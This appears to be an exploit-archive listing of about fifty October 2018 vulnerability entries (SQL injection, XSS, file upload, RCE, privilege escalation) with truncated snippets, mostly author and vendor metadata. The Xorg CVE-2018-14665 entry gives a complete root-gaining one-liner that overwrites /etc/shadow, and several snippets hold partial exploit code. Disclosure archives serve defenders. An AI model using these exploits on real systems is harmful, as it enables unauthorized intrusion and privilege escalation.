Library Management System 1.0 - 'frmListBooks' SQL Injection
Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
Grapixel New Media 2 - 'pageref' SQL Injection
Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection Exploit Author: Berk Dusunur Google Dork: N/A Type: Web App Date: 2018-10-26 Vendor Homepage: http://www.grapixel.com Software Link: http://www.grapixel.com Affected Version: v2 Tested on: MacosX CVE : N/A Proof Of Concept Time-Based s...
Delta Sql 1.8.2 - 'id' SQL Injection
Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://deltasql.sourceforge.net/ Software Link: https://sourceforge.net/projects/deltasql/files/latest/download Software Link: http://deltasql.sourceforge.net/deltasql/...
MPS Box 0.1.8.0 - Arbitrary File Upload
Exploit Title: MPS Box 0.1.8.0 - Arbitrary File Upload Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.mpsbox.com/ Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download Version: 0.1.8.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CV...
Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection
Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: https://vetclinic.sourceforge.io/ Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download Version: 00.02 Category: Webapp...
Quick Count 2.0 - 'txtInstID' SQL Injection
Exploit Title: Quick Count 2.0 - 'txtInstID' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: https://quickcount.sourceforge.io/ Software Link: https://sourceforge.net/projects/quickcount/files/latest/download Version: 2.0 Category: Webapps Tested on:...
BORGChat 1.0.0 build 438 - Denial of Service (PoC)
Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service PoC Dork: N/A Date: 2018-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: http://borgchat.10n.ro Software Link: http://borgchat.10n.ro/download.php Version: 1.0.0 build 438 Category: Dos Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A POC: 1...
libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer
libtiff up to and including 4.0.9 decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size. The issue occurs because JBIGDecode entirely ignores the size of the buffer that is passed to it: static int JBIGDecode(TIFF* tif, uint8* buffer, tmsize_t size, uint16 s) { struct jbg_dec_state...
WebExec - (Authenticated) User Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Windows XP systems that are not part of a domain default to treating all network logons as if they were Guest. This prevents SMB relay attacks from gaining administrativ...
Simple Chat System 1.0 - 'id' SQL Injection
Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download Version: 1....
AjentiCP 1.2.23.13 - Cross-Site Scripting
Title: AjentiCP 1.2.23.13 - Cross-Site Scripting Author: Numan OZDEMIR https://infinitumit.com.tr Vendor Homepage: ajenti.org Software Link: https://github.com/ajenti/ajenti Version: Up to v1.2.23.13 CVE: CVE-2018-18548 Description: Attacker can inject JavaScript codes without Ajenti privileges b...
Simple POS and Inventory 1.0 - 'cat' SQL Injection
Exploit Title: Simple POS and Inventory 1.0 - 'cat' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/11625/simple-pos-and-inventory-system.html Software Link:...
MPS Box 0.1.8.0 - 'uuid' SQL Injection
Exploit Title: MPS Box 0.1.8.0 - 'uuid' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.mpsbox.com/ Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download Version: 0.1.8.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE...
Ekushey Project Manager CRM 3.1 - Cross-Site Scripting
Exploit Title: Ekushey Project Manager CRM 3.1 - Cross-Site Scripting Date: 2018-10-16 Exploit Author: Ismail Tasdelen Vendor Homepage: http://creativeitem.com/ Software Link : http://creativeitem.com/demo/ekushey/ Software : Ekushey Project Manager CRM Version : 3.1 Vulnerability Type : Cross-si...
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team // URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ package ysoserial.payloads; import com.sun.jndi.rmi.registry.ReferenceWrapperStub; import sun.rmi.server.UnicastRef; import...
ClipBucket 2.8 - 'id' SQL Injection
Exploit Title: ClipBucket 2.8 - 'id' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://clipbucket.com/ Software Link: https://sourceforge.net/projects/clipbucket/files/latest/download Version: 2.8.v3354 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
Adult Filter 1.0 - Buffer Overflow (SEH)
Exploit Title: Adult Filter 1.0 - Buffer Overflow SEH Exploit Author: Özkan Mustafa Akkuş AkkuS Discovery Date: 2018-10-25 Homepage: http://www.armcode.com/adult-filter/ Software Link: http://www.armcode.com/downloads/adult-filter.exe Version: 1.0 Tested on: Windows XP Professional SP3 ENG Steps ...
WebEx - Local Service Permissions Exploit (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WebEx Local Service Permissions Exploit', 'Description' = %q This module exploits a flaw in the 'webexservice' Windows service, which runs as...
xorg-x11-server < 1.20.3 - Local Privilege Escalation
CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow or any file on most Linux, get root privileges. BSD and any other Xorg desktop also affected. !/bin/sh local privilege escalation in X11 currently...
phptpoint Hospital Management System 1.0 - 'user' SQL injection
Exploit Title: phptpoint Hospital Management System 1.0 - 'user' SQL injection Date: 2018-10-24 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.phptpoint.com/ Software Link: Version: 1 Tested on: WAMP windows 10 x64 CVE: unknown Description: Phptpoin...
phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection Date: 2018-10-24 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.phptpoint.com/ Software Link: https://www.phptpoint.com/pharmacy-management-system/ Version: 1 Tested...
ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution Date: 2018-10-22 Exploit Author: Özkan Mustafa Akkuş AkkuS Contact: https://pentest.com.tr Vendor Homepage: https://www.projeqtor.org Software Link:...
Delta Sql 1.8.2 - Arbitrary File Upload
Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://deltasql.sourceforge.net/ Software Link: https://sourceforge.net/projects/deltasql/files/latest/download Software Link: http://deltasql.sourceforge.net/deltasql/...
User Management 1.1 - Cross-Site Scripting
Exploit Title: User Management 1.1 - Cross-Site Scripting Date: 2018-10-16 Exploit Author: Ismail Tasdelen Vendor Homepage: http://ardawan.com/ Software Link : http://um.ardawan.com Software : User Management Version : 1.1 Vulnerability Type : Cross-site Scripting Vulnerability : Stored XSS CVE :...
AiOPMSD Final 1.0.0 - 'q' SQL Injection
Exploit Title: AiOPMSD Final 1.0.0 - 'q' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: https://aiopmsd.sourceforge.io/ Software Link: https://sourceforge.net/projects/aiopmsd/files/latest/download Version: 1.0.0 Category: Webapps Tested on:...
Open STA Manager 2.3 - Arbitrary File Download
Exploit Title: Open STA Manager 2.3 - Arbitrary File Download Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.openstamanager.com/ Software Link: https://sourceforge.net/projects/openstamanager/files/latest/download Version: 2.3 Category: Webapps Tested on:...
exim 4.90 - Remote Code Execution
Exploit Title: exim 4.90 - Remote Code Execution Date: 2018-10-24 Exploit Author: hackk.gr Vendor Homepage: exim.org Version: exim -1: authplainavailable = True if test: if lenl 70: sys.stdout.writel:70 + " ...\n" sys.stdout.flush else: print l.strip"\r".strip"\n" data = data + l if data.finddeli...
Fifa Master XLS 2.3.2 - 'usw' SQL Injection
Exploit Title: Fifa Master XLS 2.3.2 - 'usw' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: http://fankstribe.org/ Software Link: https://sourceforge.net/projects/fifamasterxls/files/latest/download Version: 2.3.2 Category: Webapps Tested on:...
LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting
Exploit Title: LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Date: 2018-10-16 Exploit Author: Ismail Tasdelen Vendor Homepage: http://pokkho.com/lango/ Software Link : http://pokkho.com/lango/auth/login Software : LANGO - Codeigniter Multilingual Script Version : 1.0...
SG ERP 1.0 - 'info' SQL Injection
Exploit Title: SG ERP 1.0 - 'info' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: http://fankstribe.org/ Software Link: https://sourceforge.net/projects/sgerp/files/latest/download Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A POC:...
Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting Dork: n/a Date: 2018-10-11 Exploit Author: Dino Barlattani Vendor Homepage: http://axiositalia.it/ Software Link: http://axiositalia.it/?pageid=1907 Version: 1.7.0/7.0.0 Category: Webapps Platform: AS...
Apache OFBiz 16.11.04 - XML External Entity Injection
Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection Date: 2018-10-15 Exploit Author: Jamie Parfet Vendor Homepage: https://ofbiz.apache.org/ Software Link: https://archive.apache.org/dist/ofbiz/ Version: xXx xXx """ if lensys.argv = 1: print' Apache OFBiz 16.11.04 XXE' print' Use...
Adult Filter 1.0 - Denial of Service (PoC)
Exploit Title: ADULT FILTER 1.0 - Denial of Service PoC Date: 2018-10-28 Exploit Author: Beren Kuday GÖRÜN Vendor Homepage: http://www.armcode.com/adult-filter/ Software Link: http://www.armcode.com/downloads/adult-filter.exe Version: 1.0 Build 2007-Mar-12 Tested on OS: Windows XP Professional...
SIM-PKH 2.4.1 - Arbitrary File Upload
Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload Dork: N/A Date: 2018-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://simpkh.sourceforge.io/ Software Link: https://sourceforge.net/projects/simpkh/files/latest/download Version: 2.4.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
Appsource School Management System 1.0 - 'student_id' SQL Injection
Exploit Title: Appsource School Management System 1.0 - 'student_id' SQL Injection Dork: N/A Date: 2018-10-19 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.appsource.ug/school/ Software Link: https://sourceforge.net/p/appsource-school-system/code/ Version: 1.0 Category: Webapps Tested o...
ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write
Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service PoC Author: John Page aka hyp3rlinx Date: 2018-10-23 Vendor: www.serverscheck.com Software Link: http://downloads.serverscheck.com/monitoringsoftware/setup.exe CVE: N/A References:...
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
Exploit Title: School ERP Pro+Responsive 1.0 - 'fid' SQL Injection Dork: N/A Date: 2018-10-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.arox.in/ Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download Software Link: http://erp.arox.in/...
SIM-PKH 2.4.1 - 'id' SQL Injection
Exploit Title: SIM-PKH 2.4.1 - 'id' SQL Injection Dork: N/A Date: 2018-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://simpkh.sourceforge.io/ Software Link: https://sourceforge.net/projects/simpkh/files/latest/download Version: 2.4.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection Author: John Page aka hyp3rlinx Date: 2018-10-23 Vendor: www.serverscheck.com Software link: http://downloads.serverscheck.com/monitoringsoftware/setup.exe CVE: N/A References:...
Microsoft Data Sharing - Local Privilege Escalation (PoC)
Bug description: RpcDSSMoveFromSharedFilehandle,L"token",L"c:\blah1\pci.sys"; This function exposed over alpc, has an arbitrary delete vuln. Hitting the timing was pretty annoying. But my PoC will keep rerunning until c:\windows\system32\drivers\pci.sys is deleted. I believe it's impossible to hit...
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
Exploit Title: MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection Dork: N/A Date: 2018-10-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.m-gb.org/ Software Link: https://sourceforge.net/projects/mopzz-gb/files/latest/download Version: 0.7.0.2 Category: Webapps Tested on:...
School ERP Pro+Responsive 1.0 - Arbitrary File Download
Exploit Title: School ERP Pro+Responsive 1.0 - Arbitrary File Download Dork: N/A Date: 2018-10-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.arox.in/ Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download Software Link: http://erp.arox.in/...
Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' = %q This module exploits elevation of privilege vulnerability that exists i...
Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
Exploit Title: Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection Dork: N/A Date: 2018-10-19 Exploit Author: Ihsan Sencan Vendor Homepage: https://viva-visitor.sourceforge.io/ Software Link: https://sourceforge.net/projects/viva-visitor/files/latest/download Version: 0.95.1...
Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory
iohideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it puts a mach message which it sends whenever it wants to notify a client that there's data available in the queue. As a client we can modify this mach message such that the server hidd on MacOS,...
eNdonesia Portal 8.7 - 'artid' SQL Injection
Exploit Title: eNdonesia Portal 8.7 - 'artid' SQL Injection Dork: N/A Date: 2018-10-21 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.endonesia.org/ Software Link: https://sourceforge.net/projects/endonesia/files/latest/download Version: 8.7 Category: Webapps Tested on:...
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
iohideventsystem is a MIG service which provides proxy access to various HID devices for untrusted clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is in IOKit.framework. I, and also pangu jailbreak team, had previously found a few bugs in the kernel...
The Open ISES Project 3.30A - 'tick_lat' SQL Injection
Exploit Title: The Open ISES Project 3.30A - 'tick_lat' SQL Injection Dork: N/A Date: 2018-10-18 Exploit Author: Ihsan Sencan Vendor Homepage: http://openises.sourceforge.net/ Software Link: https://sourceforge.net/projects/openises/files/latest/download Version: 3.30A050318 Category: Webapps Test...
Keybase keybase-redirector - '$PATH' Local Privilege Escalation
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application into executing a custom fusermount binary as root. Environment CentOS Linux...
The Open ISES Project 3.30A - Arbitrary File Download
Exploit Title: The Open ISES Project 3.30A - Arbitrary File Download Dork: N/A Date: 2018-10-18 Exploit Author: Ihsan Sencan Vendor Homepage: http://openises.sourceforge.net/ Software Link: https://sourceforge.net/projects/openises/files/latest/download Version: 3.30A050318 Category: Webapps Test...